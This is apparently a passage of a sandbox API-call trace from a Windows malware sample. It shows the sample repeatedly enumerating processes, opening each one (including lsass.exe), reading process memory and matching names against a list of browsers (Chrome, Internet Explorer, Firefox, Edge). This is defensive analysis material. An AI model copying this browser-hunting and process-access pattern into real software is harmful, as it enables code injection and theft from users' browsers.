	[0212.899] ReadProcessMemory (in: hProcess=0x3ef4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0212.899] ReadProcessMemory (in: hProcess=0x3ef4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0212.899] ReadProcessMemory (in: hProcess=0x3ef4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0212.899] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0212.899] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0212.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3ef8
	[0212.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.900] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0212.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.900] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0212.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.901] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0212.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.901] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.901] NtQueryInformationProcess (in: ProcessHandle=0x3ef8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0212.901] ReadProcessMemory (in: hProcess=0x3ef8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0212.901] ReadProcessMemory (in: hProcess=0x3ef8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0212.901] ReadProcessMemory (in: hProcess=0x3ef8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0212.902] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0212.902] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0212.902] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3efc
	[0212.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.902] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0212.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.903] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.903] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0212.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.903] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.904] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0212.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3f00
	[0212.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.904] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0212.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.905] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.905] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0212.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.905] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.906] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3f04
	[0212.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.906] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.907] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.907] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.907] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3f08
	[0212.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.909] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.910] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.910] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.910] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.910] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0212.911] CloseHandle (hObject=0x188) returned 1
	[0212.911] Sleep (dwMilliseconds=0x64) 
	[0213.020] GetCurrentProcessId () returned 0x110
	[0213.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0213.025] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0213.026] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0213.028] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0213.029] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3f0c
	[0213.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.029] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.030] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.031] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.031] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.032] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.033] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3f10
	[0213.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.033] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.034] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.034] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.035] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.035] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0213.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3f14
	[0213.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.036] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0213.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.036] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.036] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0213.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.037] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.037] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3f18
	[0213.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.038] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.038] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.038] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.039] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.039] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0213.039] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3f1c
	[0213.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.040] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0213.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.040] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.040] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0213.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.041] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.041] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0213.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3f20
	[0213.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.042] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0213.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.042] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.042] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0213.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.043] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.043] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0213.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3f24
	[0213.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.044] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0213.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.044] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.044] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0213.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.045] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.045] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0213.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3f28
	[0213.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.046] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.046] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.046] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.047] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.047] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.047] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3f2c
	[0213.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.048] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.048] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.048] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.049] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.049] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.049] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3f30
	[0213.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.050] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.051] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.051] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.052] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.052] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3f34
	[0213.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.053] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.053] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.053] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.054] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.054] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3f38
	[0213.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.055] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.055] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.055] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.056] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.056] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3f3c
	[0213.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.057] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.057] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.057] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.058] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.058] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3f40
	[0213.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.059] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.059] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.059] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.060] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.060] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.061] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3f44
	[0213.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.061] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.061] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.061] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.062] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.062] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0213.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3f48
	[0213.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.063] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0213.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.063] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.063] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0213.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.064] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.064] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3f4c
	[0213.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.065] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.065] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.066] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
